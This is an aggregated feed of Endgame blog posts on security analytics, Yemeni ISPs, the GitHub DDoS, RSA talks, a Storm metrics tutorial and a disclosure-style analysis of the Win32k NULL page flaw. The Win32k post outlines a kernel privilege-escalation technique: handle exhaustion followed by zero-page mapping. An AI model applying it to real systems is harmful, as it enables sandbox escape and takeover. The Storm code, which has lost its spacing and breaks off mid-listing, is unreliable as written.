Quantcast
Channel: Endgame's Blog
Viewing all 698 articles
Browse latest View live

Beyond the Buzz: Integrating Big Data & User Experience for Improved Cyber Security

$
0
0

UXBigDataBlogImage.jpg

by Andrea Little Limbago

Big Data and UX are much more than industry buzzwords—they are some of the most important solutions making sense of the ever-increasing complexity and dynamism of the international system. While big data analytics and user experience communities (UX) have made phenomenal technical and analytic breakthroughs, they remain stovepiped, often working at odds, and alone will never be silver bullets. Big data solutions aim to contextualize and forecast anything from disease outbreaks to the next Arab Spring. Conversely, the UX community points to the interface as the determinant battleground that will either make or break companies. This disconnect is especially prevalent in cyber security and it is the user (and their respective companies) who suffers most. Users are either left with too much data but not the means within their skillset to explore it, or a beautiful interface that lacks the data or functionality the users require. But the monumental advances in data science and UX together have the potential to instigate a paradigm shift in the security industry. These disparate worlds must be brought together to finally contextualize the threat and the risks, and make the vast range of security data much more accessible to a larger analytic and user base within an organization.

The Tech Battlegrounds

At a 2012 Strata conference, there was a pointed discussion on the importance of machine learning versus domain expertise. Not surprisingly, the panelists leaned in favor of machine learning, highlighting its many successes in forecasting across a variety of fields. The die was cast. Big data replaced the need for domain expertise and has become a booming industry, expanding from $3.2B in 2010 to $16.9B in 2015. For companies, the ability to effectively and efficiently sift through the data is essential. This is especially true in security, where the challenges of big data are even more pronounced given the need to expeditiously and persistently maintain situational awareness of all aspects of a network. Called anything from the sexiest job of the twenty-first century to a field whose demand is exploding, there is no shortage of articles highlighting the need for strong data scientists. More often than not, the spotlight is warranted. Depending on which source is referenced, over 90% of the world’s data has been created in the last two years, garnering big data superlatives such as total domination and the data deluge.

Clearly, there is a need to leverage everything from machine learning to applied statistics to natural language processing to help make sense of this data. However, most big data analysis tools – such as Hadoop, NoSQL, Hive, R or Python – are crafted for experienced data scientists. These tools are great for the experts, but are completely foreign to many. As has been well documented, the experts are few and far between, restricting full data exploration to the technical experts, no matter how quantitatively minded one might be. The user experience of these tools is not big data’s only problem. Without the proper understanding of the data and its constraints, data analytics can have numerous unintended consequences. For instance, had first responders focused on big data analyses of Twitter during Hurricane Sandy, they would have ignored the large swath of land without Internet access, where the help was most needed. In the education realm, universities are worried about profiling as a result of data analysis, even to the extreme of viewing big data as an intruder. Similarly, even with the most comprehensive data, policy responses require a combination of data-driven input, as well as contextual cultural, social, and economic trade-offs that correspond with various policy alternatives. As Erin Simpson notes, “The information revolution is too important to be left to engineers alone.” David Brooks summarized some of the shortcomings of big data, with an emphasis on bringing the necessary human element to big data analytics. Not only are algorithms required, but contextualization and domain expertise are also necessary conditions in this realm. This is especially true in cyber security, where some of the major breaches of the last few years occurred despite the targets actually possessing the data to identify a breach.

So how can companies turn big data to their advantage in a way that actually enables their current workforce to explore, access and discover within a big data environment? A new tech battleground has emerged, one for the customer interface. The UX community boasts its essential role in determining a tech company’s success and ability to bring services to users. Similar to the demand for data scientists, UX is one of the fastest growing fields, becoming “the most important leaders of the new business era…The success of companies in the Interface Layer will be designer-driven, and the greatest user experience (speed, design, etc.) will win.” The user-experience can either breed great product loyalty, or forever deter a user from a given product or service. From this perspective, technology is a secondary concern, driven by UX. The UX community prioritizes the essential role of humans over technologies, focusing on what the users experience and perceive. This is not just a matter of preferences and brand loyalty; it’s about the bottom line. By one measure, every $1 invested in UX yields a $2-$100 return.

In fact, the UX community is increasingly denoting the essential role of UX in extracting insights from the data. Until relatively recent advances in UX, the data and the technologies were both inaccessible for the majority of the population, driving them to spreadsheets and post-it notes to explore data. UX provides the translation layer between the big data analytics technologies and the users, enabling visually intuitive and functional access to data. The UX democratizes access to big data – both the technologies driving big data analytics as well as the data itself. Unfortunately, the pendulum may have swung too far, with data perceived at best as “a supporting character in a story written by user experience” and at worst as simply ignored. The interface layer alone is not sufficient for meeting the challenges of a modern data environment.

A Unified Approach

The data science and UX communities are innovating and modernizing in parallel silos. In some industries, such as cyber security, they are unfortunately rarely a consideration. Although necessary, neither is sufficient to meet the needs of the user community. Customers are not drawn to a given product for its interface, no matter how beautiful and elegant it might be. It has to solve a problem. The reason products such as Amazon, Uber and Spotify are so popular is because of the data and data analytics underlying the services they provide. In each case, each product filled a niche or disrupted an inefficient process. That said, none of these would have caught on so quickly or at all without the modern UX that enabled that fast, efficient and intuitive exploration of the data. Steve Jobs mastered this confluence of technology and the arts, noting“technology alone is not enough. It’s technology married with liberal arts, married with humanities, that yields the results that make our hearts sing.”

It is this confluence of the arts and technology – the UX and the data science – that can truly revolutionize the security industry. The tech battlegrounds over machine learning and domain expertise or big data and UX are simply a waste of time. To borrow from Jerome Kagan, this is similar to asking whether a blizzard is caused by temperature or humidity – both are required. Together, sophisticated data science and modern, intuitive UX can truly innovate the security community. It is not a zero sum game, and the integration of the two is long overdue for security practitioners. The security threatscape is simply too dynamic, diverse and disparate to be tackled with a single approach. Moreover, the stakes are too high to continue limiting access to digital tools and data to only a select few personnel within a company. The smart integration of data science and the UX communities could very well be the long overdue paradigm shift the security community needs to truly distill the signal from the noise.

Graphic credit: Philip Jean-Pierre


See Your Company Through the Eyes of a Hacker: Turning the Map Around On Cybersecurity

$
0
0

Today, Harvard Business Review published “See Your Company Through the Eyes of a Hacker: Turning the Map Around On Cybersecurity” by Endgame CEO Nate Fick. In this piece, Nate argues that in order for enterprises to better defend themselves against the numerous advanced and pervasive threats that exist today, they must take a new approach. By looking at themselves through the eyes of their attackers—in the military, “turning the map around”—companies can get inside the mind of the adversary, see the situation as they do, and better prepare for what’s to come.

Nate identifies four ways that companies can “turn the map around” and better defend themselves against attackers. Read the full article at HBR.org

Sign up here for more News & Communications from Endgame.

Meet Nate and the Endgame team at RSA 2015. We’ll be in booth #2127 – register here for a free expo pass (use the registration code X5EENDGME) and stop by to learn more about Endgame.

Data-Driven Strategic Warnings: The Case of Yemeni ISPs

$
0
0

by Andrea Little Limbago

In 2007, a flurry of denial of service attacks targeted Estonian government websites as well as commercial sites, including banks. Many of these Russian-backed attacks were hosted on servers located in Russia. The following year, numerous high profile Georgian government and commercial sites were forced offline, redirected to servers in Moscow. Eventually, the Georgian government transferred key sites, such as the president’s site, to US servers. These examples illustrate the potential vulnerability of hosting sites on servers in adversarial countries. Both Estonia and Georgia are highly dependent on the Internet, with Estonia conducting virtually everything online from voting to finance. At the opposite end of the spectrum is Yemen, with twenty Internet users per 100 people. Would the same kind of vulnerability experienced by Georgian sites be a concern for a country with minimal Internet penetration?

For low and middle-income countries, traditional indicators of instability and dependencies – such as conflict measures or foreign aid, respectively – tend to drive risk assessments. When modern technologies are taken into account, most of this work focuses on the role of social media, as the majority of research on the Arab Spring and now ISIS reflects. While these technologies are important to include, they do not reflect the full spectrum of digitally focused insights that can be garnered for geopolitical analyses. More specifically, the hosting and/or transfer of strategic servers hosted in adversarial (or allied) sovereign territory could provide an oft-overlooked signal of a country’s intent. Eliminating this risk could be a subtle, but insightful, change that may warrant additional attention. The changing digital landscape could provide great value and potentially strategic warning of an altering geo-political landscape.

The Public Telecommunication Corporation (PTC) is the operator of Yemen’s major Internet service providers, Yemennet and TeleYemen. Using Endgame’s proprietary data, it is possible to analyze the changing digital landscape of all Internet-facing devices, including the digital footprint of the ISPs. The geo-enrichment and organizational information, when explored temporally, may shed light both on transitioning allegiances, as well as on who controls access to key digital instruments of power during conflict. These are state-affiliated ISPs, and in turn can be used for censorship and propaganda by those who control them, as exemplified in Eastern Europe. In fact, news broke on 26 March that Yemennet is blocking access to numerous websites opposed to Houthi groups. Houthis control the capital and have expanded their reach, leading to the recent air strikes by Saudi Arabia and Gulf Cooperation Council allies.

Looking at data from early 2011 to the present, it is apparent that the PTC and Yemennet particularly had a footprint mainly in Yemen, but also in Saudi Arabia as well.

Figure1.PNG

PTC Cumulative Host Application Footprint 2011-2015

Figure2.PNG

Yemennet Cumulative Host Application footprint 2011-2015

However, the larger temporal horizon masks changes that occurred during these years. The maps below illustrate data over the last year, highlighting that the digital footprint has moved to entirely within Sana.

Figure3.PNG

PTC footprint 2014-15

Figure4.PNG

Yemennet Footprint March 2014-2015

An overview of the time series data shows a dramatic termination of a presence in Saudi Arabia during the summer of 2013.

Figure5.PNG

To ensure this breakpoint was not simply an elimination of the IP blocks located in Riyad and Jeddah, but rather a move to Sana, I explored numerous IP addresses independently to assess the change. In each case, the actual hosting of the IP address transferred from Saudi Arabia to Yemen. Interestingly, just prior to the breakpoint in the data, an (allegedly) Iranian shipment of Chinese missiles was located off the coast of Yemen, which were intended at the time for Houthi rebels in the northwestern part of the country. Moreover, the breakpoint also occurs within the same timeframe of the termination of Saudi Arabia’s aid to Yemen, which had been the bedrock of the relationship for decades. In fact, the elimination of this aid was described as giving “breathing space for it (Yemen) to become independent of its ‘big brother’ next door.” It is plausible that this transfer of domain host locations is similarly part of the larger desire for “breathing space”, or elimination of dependencies on its powerful neighbor.

Does this transfer of the main Yemeni ISPs away from Saudi Arabia to entirely within Yemen’s borders indicate a strategic change? As is the case with all strategic warnings, they should be validated with additional research. Nevertheless, data-driven strategic warnings are few and far between in the realm of international relations. Even the smallest proactive insight into potential changes in the geo-political landscape could help highlight and focus attention to areas previously overlooked. Despite the presence of al-Qaeda in the Arabian Peninsula (AQAP), Yemen has not garnered much attention outside of the counter-terrorism domain. But as we’re seeing now, Yemen could very well be the battleground for a proxy conflict between the dominant actors in the Middle East. Perhaps any exploration of Yemen’s digital landscape during 2013 could have prompted a more holistic and proactive analysis into the changing regional dynamics. The digital landscape of key organizations may offer a range of insights that just may provide enough strategic insight to help enable proactive research into regions that are on the verge of major tectonic geopolitical shifts. With the onset of the cyber domain as a major battleground for power politics, digital data must be integrated not only into tactical analyses, but also can help inform strategic warning as well.

Meet Endgame at RSA 2015

$
0
0

Endgame will be at RSA 2015!

Stop by the South Hall, Booth #2127 to:

  • Get a product demo. Learn more about how we help customers instantly detect and actively respond to adversaries.

  • Learn from our experts. We’ll present three technical talks at our booth throughout the week. No registration required - just show up!

RSATalkCalendar2.jpg

Don’t have an expo pass? Register here for a free expo pass courtesy of Endgame (use the registration code X5EENDGME).

Technical Talk Descriptions

Vulnerability and Exploit Trends: Using Behavioral Analysis and Operating System Defenses to Prevent Advanced Threats
Speaker: Cody Pierce, Endgame Director of Vulnerability Research

Despite the best efforts of the security community—and big claims from security vendors—large areas of vulnerabilities and exploits remain to be leveraged by adversaries. Attendees will learn about:

  • A new perspective on the current state of software flaws.
  • The wide margin between disclosed vulnerabilities and public exploits including a historical analysis and trending patterns.
  • Effective countermeasures that can be deployed to detect, and prevent, the exploitation of vulnerabilities.
  • The limitations of Operating System provided mitigations, and how a combination of increased countermeasures with behavioral analysis will get defenders closer to preventing the largest number of threats.

Cody Pierce has been involved in computer and network security since the mid 90s. For the past 13 years he has focused on discovery and remediation of known and unknown vulnerabilities. Instrumental in the success of HP’s Zero Day Initiative program, Cody has been exposed to hundreds of 0day vulnerabilities, advanced threats, and the most current malware research. At Endgame, Cody has lead a successful team tasked with analyzing complex software to identify unknown vulnerabilities and leveraged global situational awareness to manage customer risk.

Sensornet™ Attack Patterns and What They Mean for Defenders
Speaker: Curt Barnard, Endgame Software Implementation Engineer

The Internet is flooded with traffic from web crawlers, port scanners, and brute force attacks. Data analyzed from Sensornet™, a unique network of sensors, allows us to observe trends on the Internet at large. Attendees will learn:

  • How to identify if malicious traffic directed at your network service is part of a larger CNO campaign.
  • How to get advanced warning of new attacks and malware seen in the wild but not yet reported on.
  • How network defenders can better protect themselves against attacks that occur at scale.
  • How Endgame identifies malicious hosts that are attempting to leverage exploits such as the Shellshock vulnerability at scale.

Curt Barnard is a network security professional with six years of experience. While attending the Air Force Institute of Technology, he conducted research on advanced methods of covert data exfiltration, steganography, and digital forensics. As a Department of Defense employee, Curt focused on analysis and operations to counter some of the most advanced cyber threats. At Endgame, Curt continues this research, coaxing malicious actors into revealing their TTP’s and creating defensive measures based on real-time threat data.

Using Data Science to Solve Security Problems
Speaker: Phil Roth, Endgame Data Scientist

Data science techniques can help organizations solve their security problems — but they aren’t a silver bullet. Working directly with customers, Endgame has been able to match the right science to unsolved customer security challenges to create effective solutions. In this talk, attendees will experience a small part of that process by learning:

  • How machine learning techniques can be used to find security insights in large amounts of data.
  • The difference between supervised and unsupervised learning and the different types of security problems they can solve.
  • How a lack of labeled data and the high cost of misclassifications present challenges to data scientists in the security industry.
  • How Endgame has used an unsupervised clustering technique to group cloud-based infrastructure, a fundamental step in the detection of malicious behavior.

Phil Roth cleans, organizes, and builds models around security data for Endgame. He learned those skills in academia while earning his physics PhD at the University of Maryland. It was there that he built data acquisition systems and machine learning algorithms for a large neutrino telescope called IceCube based at the South Pole. He has also built image processors for air and space based radar systems.

Git Hubris? The Long-Term Implications of China’s Latest Censorship Campaign

$
0
0

GitHubBlogGraphic.jpg

by Andrea Little Limbago

Last Friday, GitHub, the popular collaborative site for developers, experienced a series of distributed denial of service (DDoS) attacks. The attacks are the largest in the company’s history, and continued through Tuesday before fully coming under control. GitHub has not been immune to these kinds of attacks in the past, and is quite experienced at maintaining or restoring the site during the onslaught. In both 2012 and 2013, GitHub experienced a series of DDoS attacks and experienced similar attacks earlier in March. By all independent accounts, the Cyberspace Administration of China (CAC) is behind this latest wave of attacks, redirecting traffic from the Chinese search engine, Baidu, to overwhelm GitHub. While the malicious activity bears the fingerprints of a Chinese campaign, they may have awoken a sleeping giant in the open source development community. Unlike the latest high profile attacks – such as Sony and Anthem – these attacks visibly disrupted the day-to-day life of a tight knit, transnational and largely middle-class social network. And it is these kinds of transnational networks that, when unified, spawn social movements.

This week’s attack focused on pressuring GitHub to remove content related to GreatFire.org and another site that hosts links to the Chinese version of The New York Times. Both of these are platforms for circumventing the Great FireWall, and therefore are a direct attack both on free speech and also the tech community. In the past, China has restored access to GitHub due to criticism from the domestic developer community. However, China has been tightening censorship over the last few years, which has instigated the creation of groups like Great Fire to partner with external partners – such as Reporters without Borders – to help fight Chinese censorship. With over 300 cofounders, Great Fire is gaining traction and has tightened relations with the major media outlets outside of China. It is these kinds of transnational activist networks that have proven so successful in the past. Written well before rise of social media, Margaret Keck and Kathryn Sikkink’s Activists without Borders introduced the concept of the boomerang effect. The boomerang effect occurs when a state is unresponsive to the demands of domestic groups, who then form transnational alliances to amplify the demands of the groups and readdress the demands via international pressure. To date, Great Fire is pursuing a similar trajectory to previous successful social movements.

Is it possible that the latest wave of DDoS attacks is enough to fully solidify the relationship of groups like Great Fire not only with journalists, but also with the open source development community? A brief review of Twitter content (similar to those screenshots below) pertaining to the GitHub DDoS attacks produces three general themes: 1) who is doing this?; 2) why are they doing this; 3) stop messing with my project. In fact, one popular source for open source news asks, “Who on Earth would attack GitHub?” The open source community is clearly one of the largest proponents of free speech and collaboration, which has been very vocal in issues of privacy, but has been relatively silent on global events. Nevertheless, couple that intrinsic and core set of beliefs with disruption to their own projects, and the conditions are created under which social movements begin to coalesce. More recent literature on social movements further highlights the greater success of the movements when pursuing non-violent means to instigate change.

The latest executive order sanctions those associated with cyber attacks, but it is more so reactive than proactive. The open source community could build upon lessons learned from the GitHub experience, and collaborate with colleagues throughout the tech community to inflict economic damage on those who are directly attacking open source development. For instance, a de facto embargo on certain technologies to China is much more politically feasible and costly than working through the ITAR process. While the tipping point for awareness has not yet been reached – one indication of which is the lack of prominent mainstream media on the GitHub breach – the conditions are ripe for the start of a transnational social movement, driven by the open source development community if it coalesces around this cause (similar to that which occurred over privacy concerns) instead of allowing it to silently dissipate.

githubgraphic.jpg

In contrast, China likely sees this latest GitHub campaign as simply an extension of previous breaches, which failed to garner any political blowback, but aided their larger censorship efforts. However, China will increasingly have to deal with the growing paradox of promoting censorship as well as technical development. This is one of the many contradictions China continues to encounter as it simultaneously modernizes its economy and seeks global ambitions. The choice of Baidu, for instance, potentially reveals another rift in China’s approach to development. Robin Li is the CEO of Baidu, is the third wealthiest man in China, and a member of the government’s top political advisory council. This makes the choice of Baidu potentially confrontational, as it is publicly traded and not part of the state-owned enterprises that tend to operate at the behest of the government. So far, Baidu has denied any connection to the GitHub attacks. Contradictions like these are only increasingly surfacing as corruption campaigns, censorship and extension of power dominate Chinese politics.

The latest GitHub attack, the largest in its history, remains off the radar for all but those in larger technology and open source communities. This is unfortunate as it has the potential to have much broader long term implications within China than any of the other Chinese-associated attacks in the last year. It will be interesting to watch whether the open source community will use this as a springboard for global advocacy for free speech with the potential to inflict economic and technological pain. The current response has been luke warm at best, but the conditions are ripe for change. China might do well to heed the advice of Barrington Moore, who over a half century ago wrote about the preconditions for social movements toward democracy and dictatorships. He notes that the tipping point of change tends to occur when the daily routines of the middle class is disrupted or threatens to be destroyed. China has crossed this threshold, and very well may be uniting the transnational network on which movements are made.

Endgame Participates in Tough Mudder Benefitting Wounded Warrior Project

$
0
0

On April 20, over thirty Endgame employees, family members and friends participated in the Mid-Atlantic Spring 2013 Tough Mudder, supporting the Wounded Warrior Project. Funds raised for the Wounded Warrior Project go towards providing combat stress recovery programs, adaptive sports programs, benefits counseling, employment services and many other critical programs. Endgame is proud to support this important organization and give back to the thousands of Americans returning from the battlefield.

Microsoft Win32k NULL Page Vulnerability Technical Analysis

$
0
0

Overview

Endgame has discovered and disclosed to Microsoft the Win32 NULL Page Vulnerability (CVE-2013-3881), which has been fixed in Microsoft’s October Security Bulletin, released October 8, 2013. The vulnerability was the result of insufficient pointer validation in a kernel function that handles popup menus. Successfully exploiting this vulnerability would allow an attacker with unprivileged access to a Windows 7 or Server 2008 R2 system to gain access to the Windows kernel, thereby rendering user account controls useless.

Affected Versions

In previous versions of Windows, including XP, Server 2003, Vista, and Server 2008 R1, Microsoft actually included code that adequately verified the pointer in question. However, in Windows 7 (and Server 2008 R2), that check was removed, leading to the exploitable condition.

If the product line ended there, it would be easy to imagine that this was an inadvertent removal of what a developer mistakenly thought was a redundant check and to give it little additional thought. However, in the initial release of Windows 8 (August 2012), the pointer validation had been put back in place, long before we reported the bug to Microsoft. We would assume that when a significant security issue comes to light, Microsoft would simultaneously fix it across all affected products. Unless the Windows 8 win32k.sys code was forked from a pre-Windows 7 base, this bug was fixed upstream by Microsoft prior to our disclosure. This is purely speculative, but if our previous supposition is true, they either inadvertently fixed the bug, or recognized the bug and purposely fixed it, but failed to understand the security problem it created.

Mitigation

The good news for Windows users is that Microsoft does have a realistic approach to dealing with vulnerabilities, which resulted in some protection even prior to the release of this patch. One of the simplest security features (at least in concept, if not in implementation) that Microsoft introduced in Windows 8 was to prohibit user applications from mapping memory at virtual address zero. This technique takes the entire class of null-pointer-dereference kernel bugs out of the potential-system-compromise category and moves them into the relatively benign category of user-experience/denial-of-service problems. When Microsoft back-ported this protection to Windows 7, they eliminated the opportunity to exploit this bug on 64-bit systems. This illustrates how the conventional wisdom that “an ounce of prevention is worth a pound of cure” can be turned on its ear in the world of software vulnerabilities. Microsoft will undoubtedly be fixing null pointer dereferences in their products for as long as they support them. However, by applying a relatively inexpensive “cure”, they have limited the consequences of the problems that they will spend years trying to “prevent”.

Impact

Part of what makes this type of vulnerability so valuable to attackers is the proliferation of sandbox technologies in popular client-side applications. We have confirmed that this vulnerability can be exploited from within several client-side applications’ sandboxes, including Google Chrome and Adobe Reader, and from Internet Explorer’s protected mode. On the surface, that sounds like bad news. On the other hand, we would not have even considered that question if these mitigation technologies were not making it more difficult for attackers to compromise systems. In order to completely own a target via one of those applications, an attacker must have a vulnerability that leads to code execution, another that allows them to leak memory so as to defeat Microsoft’s memory randomization feature, and finally, a vulnerability like the one described here that allows them to escape the hobbled process belonging to the initial target application.

Technical Details

When an application displays a popup or context menu, it must call user32!TrackPopupMenu or user32!TrackPopupMenuEx in order to capture the action that the user takes relative to that menu. This function eventually leads to the xxxTrackPopupMenuEx function in win32k.sys. Since it is unusual to simultaneously display multiple context menus, there is a global MenuState object within win32k.sys that is ordinarily used to track the menu. However, since it is possible to display multiple context menus, if the global MenuState object is in use, xxxTrackPopupMenuEx attempts to create another MenuState object with a call to xxxMNAllocMenuState. xxxTrackPopupMenuEx saves the result of this allocation attempt and checks to ensure that the result was not 0, as seen in the most recent unpatched 64-bit Windows 7 version of win32k.sys (6.1.7601.18233):

xxxTrackPopupMenuEx+364 call  xxxMNAllocMenuState
xxxTrackPopupMenuEx+369 mov   r15, rax
xxxTrackPopupMenuEx+36C test  rax, rax
xxxTrackPopupMenuEx+36F jnz   short alloc_success
xxxTrackPopupMenuEx+371 bts   esi, 7
xxxTrackPopupMenuEx+375 jmp   clean_up

In the event that the allocation fails, the function skips to its cleanup routine, which under normal circumstances will cause a BSOD when the function attempts to dereference unallocated memory at r15+8:

xxxTrackPopupMenuEx+9BA clean_up:   ; CODE XREF:
xxxTrackPopupMenuEx+375j
xxxTrackPopupMenuEx+9BA bt    dword ptr [r15+8], 8

However, if we can allocate and correctly initialize the memory mapped at address zero for the process, we can reliably gain arbitrary code execution when the function passes the invalid MenuState pointer to xxxMNEndMenuState.

xxxTrackPopupMenuEx+A76 mov rcx, r15 ;pMenuState
xxxTrackPopupMenuEx+A79 call  xxxMNEndMenuState

It is possible to reliably create circumstances in which the xxxTrackPopupMenuEx call to xxxMNAllocMenuState will fail. After creating two windows, we use repeated calls to NtGdiCreateClientObj in order to reach the maximum number of handles that the process is allowed to have open. Once we have exhausted the available handles, we attempt to display a popup menu in each of the two previously created windows. Since the global MenuState object is not available for the second window’s menu, xxxTrackPopupMenuEx calls xxxMNAllocMenuState in order to create a new MenuState object. Because there are no available handles due to our previous exhaustion, this call fails and xxxMNEndMenuState is called with a parameter of 0, instead of a valid pointer to a MenuState object.

 

Storm Metrics How-To

$
0
0

If you have been following Storm’s updates over the past year, you may have noticed the metrics framework feature, added in version 0.9.0 New Storm metrics system PR. This provides nicer primitives built into Storm for collecting application specific metrics and reporting those metrics to external systems in a manageable and scalable way.

This blog post is a brief how to on using this system since the only examples of this system I’ve seen used are in the core storm code.

Concepts

Storm’s metrics framework mainly consists of two API additions: 1) Metrics, 2) Metrics Consumers.

Metric

An object initialized in a Storm bolt or spout (or Trident Function) that is used for instrumenting the respective bolt/spout for metric collection. This object must also be registered with Storm using the TopologyContext.registerMetric(…) function. Metrics must implement backtype.storm.metric.api.IMetric. Several useful Metric implementations exist. (Excerpt from the Storm Metrics wiki page with some extra notes added).

AssignableMetric — set the metric to the explicit value you supply. Useful if it’s an external value or in the case that you are already calculating the summary statistic yourself. Note: Useful for statsd Gauges.

CombinedMetric — generic interface for metrics that can be updated associatively.

CountMetric — a running total of the supplied values. Call incr() to increment by one,incrBy(n) to add/subtract the given number. Note: Useful for statsd counters.

MultiCountMetric — a hashmap of count metrics. Note: Useful for many Counters where you may not know the name of the metric a priori or where creating many Counters manually is burdensome.

MeanReducer — an implementation of ReducedMetric that tracks a running average of values given to its reduce() method. (It accepts Double, Integer or Long values, and maintains the internal average as a Double.) Despite his reputation, the MeanReducer is actually a pretty nice guy in person.

Metrics Consumer

An object meant to process/report/log/etc output from Metric objects (represented as DataPoint objects) for all the various places these Metric objects were registered, also providing useful metadata about where the metric was collected such as worker host, worker port, componentID (bolt/spout name), taskID, timestamp, and updateInterval (all represented as TaskInfo objects). MetricConsumers are registered in the storm topology configuration (usingbacktype.storm.Config.registerMetricsConsumer(…)) or in Storm’s system config (Under the config name topology.metrics.consumer.register). Metrics Consumers must implement backtype.storm.metric.api.IMetricsConsumer.

Example Usage

To demonstrate how to use the new metrics framework, I will walk through some changes I made to the ExclamationTopology included in storm-starter. These changes will allow us to collect some metrics including:

  1. A simple count of how many times the execute() method was called per time period (5 sec in this example).
  2. A count of how many times an individual word was encountered per time period (1 minute in this example).
  3. The mean length of all words encountered per time period (1 minute in this example).

Adding Metrics to the ExclamationBolt

Add three new member variables to ExclamationBolt. Notice there are all declared as transient. This is needed because none of these Metrics are Serializable and all non-transient variables in Storm bolts and spouts must be Serializable.

transientCountMetric_countMetric;transientMultiCountMetric_wordCountMetric;transientReducedMetric_wordLengthMeanMetric;

Initialize and register these Metrics in the Bolt’s prepare method. Metrics can only be registered in the prepare method of bolts or the open method of spouts. Otherwise an exception is thrown. The registerMetric takes three arguments: 1) metric name, 2) metric object, and 3) time bucket size in seconds. The “time bucket size in seconds” controls how often the metrics are sent to the Metrics Consumer.

@Overridepublicvoidprepare(Mapconf,TopologyContextcontext,OutputCollectorcollector){_collector=collector;initMetrics(context);}voidinitMetrics(TopologyContextcontext){_countMetric=newCountMetric();_wordCountMetric=newMultiCountMetric();_wordLengthMeanMetric=newReducedMetric(newMeanReducer());context.registerMetric("execute_count",_countMetric,5);context.registerMetric("word_count",_wordCountMetric,60);context.registerMetric("word_length",_wordLengthMeanMetric,60);}

Actually increment/update the metrics in the bolt’s execute method. In this example we are just:

  1. incrementing a counter every time we handle a word.
  2. incrementing a counter for each specific word encountered.
  3. updating the mean length of word we encountered.
@Overridepublicvoidexecute(Tupletuple){_collector.emit(tuple,newValues(tuple.getString(0)+"!!!"));_collector.ack(tuple);updateMetrics(tuple.getString(0));}voidupdateMetrics(Stringword){_countMetric.incr();_wordCountMetric.scope(word).incr();_wordLengthMeanMetric.update(word.length());}



 

Collecting/Reporting Metrics

Lastly, we need to enable a Metric Consumer in order to collect and process these metrics. The Metric Consumer is meant to be the interface between the Storm metrics framework and some external system (such as Statsd,Riemann, etc). In this example, we are just going to log the metrics using Storm’s built-in LoggingMetricsConsumer. This is accomplished by registering the Metrics Consumer when defining the Storm topology. In this example, we are registering the metrics consumer with a parallelism hint of 2. Here is the line we need to add when defining the topology.

conf.registerMetricsConsumer(LoggingMetricsConsumer.class,2);

Here is the full code for defining the toplogy:

TopologyBuilderbuilder=newTopologyBuilder();builder.setSpout("word",newTestWordSpout(),10);builder.setBolt("exclaim1",newExclamationBolt(),3).shuffleGrouping("word");builder.setBolt("exclaim2",newExclamationBolt(),2).shuffleGrouping("exclaim1");Configconf=newConfig();conf.setDebug(true);conf.registerMetricsConsumer(LoggingMetricsConsumer.class,2);if(args!=null&&args.length>0){conf.setNumWorkers(3);StormSubmitter.submitTopology(args[0],conf,builder.createTopology());}else{LocalClustercluster=newLocalCluster();cluster.submitTopology("test",conf,builder.createTopology());Utils.sleep(5*60*1000L);cluster.killTopology("test");cluster.shutdown();}

After running this topology, you should see log entries in $STORM_HOME/logs/metrics.logthat look like this.

<pre>2014-01-0509:25:34,80954793181388931931localhost:67029:exclaim2execute_count1962014-01-0509:25:49,80654943151388931949localhost:67038:exclaim1execute_count282014-01-0509:25:59,81255043211388931959localhost:67038:exclaim1execute_count342014-01-0509:25:59,81255043211388931946localhost:67026:exclaim1execute_count292014-01-0509:25:59,82555043341388931951localhost:67029:exclaim2execute_count9892014-01-0509:25:59,83155043401388931957localhost:67047:exclaim1execute_count6562014-01-0509:26:29,82155343301388931977localhost:67047:exclaim1word_count{bertels=435,jackson=402,nathan=405,mike=414,golda=451}2014-01-0509:26:29,82155343301388931977localhost:67047:exclaim1word_length5.7902230659705742014-01-0509:26:29,82255343311388931982localhost:670410:exclaim2word_count{bertels!!!=920,golda!!!=919,jackson!!!=902,nathan!!!=907,mike!!!=921}2014-01-0509:26:29,82355343321388931982localhost:670410:exclaim2word_length8.7944845699277752014-01-0509:26:29,82355343321388931986localhost:67029:exclaim2word_count{bertels!!!=737,golda!!!=751,jackson!!!=766,nathan!!!=763,mike!!!=715}2014-01-0509:26:29,82355343321388931986localhost:67029:exclaim2word_length8.8183279742765282014-01-0509:26:31,77755362861388931991localhost:67026:exclaim1word_count{bertels=529,jackson=517,nathan=503,mike=498,golda=511}2014-01-0509:26:31,77755362861388931991localhost:67026:exclaim1word_length5.8197810789679442014-01-0509:26:32,45455369631388931992localhost:670410:exclaim2execute_count142014-01-0509:26:49,82955543381388932009localhost:67038:exclaim1execute_count76</pre>

You should also see the LoggingMetricsConsumer show up as a Bolt in the Storm web UI, like this (After clicking the “Show System Stats” button at the bottom of the page):

Summary

  1. We instrumented the ExclamationBolt to collect some simple metrics. We accomplished this by initializing and registering the metrics in the Bolt’s prepare method and then by incrementing/updating the metrics in the bolt’s execute method.

  2. We had the metrics framework simply log all the metrics that were gathered using the built-in LoggingMetricsConsumer. The full code ishere as well as posted below. A diff between the original ExclamationTopology and mine is here.

In a future post I hope to present a Statsd Metrics Consumer that I am working on to allow for easy collection of metrics in statsd and then visualization in graphite, like this.

packagestorm.starter;importbacktype.storm.Config;importbacktype.storm.LocalCluster;importbacktype.storm.StormSubmitter;importbacktype.storm.metric.LoggingMetricsConsumer;importbacktype.storm.metric.api.CountMetric;importbacktype.storm.metric.api.MeanReducer;importbacktype.storm.metric.api.MultiCountMetric;importbacktype.storm.metric.api.ReducedMetric;importbacktype.storm.task.OutputCollector;importbacktype.storm.task.TopologyContext;importbacktype.storm.testing.TestWordSpout;importbacktype.storm.topology.OutputFieldsDeclarer;importbacktype.storm.topology.TopologyBuilder;importbacktype.storm.topology.base.BaseRichBolt;importbacktype.storm.tuple.Fields;importbacktype.storm.tuple.Tuple;importbacktype.storm.tuple.Values;importbacktype.storm.utils.Utils;importjava.util.Map;/** * This is a basic example of a Storm topology. */publicclassExclamationTopology{publicstaticclassExclamationBoltextendsBaseRichBolt{OutputCollector_collector;// Metrics// Note: these must be declared as transient since they are not SerializabletransientCountMetric_countMetric;transientMultiCountMetric_wordCountMetric;transientReducedMetric_wordLengthMeanMetric;@Overridepublicvoidprepare(Mapconf,TopologyContextcontext,OutputCollectorcollector){_collector=collector;// Metrics must be initialized and registered in the prepare() method for bolts, // or the open() method for spouts.  Otherwise, an Exception will be 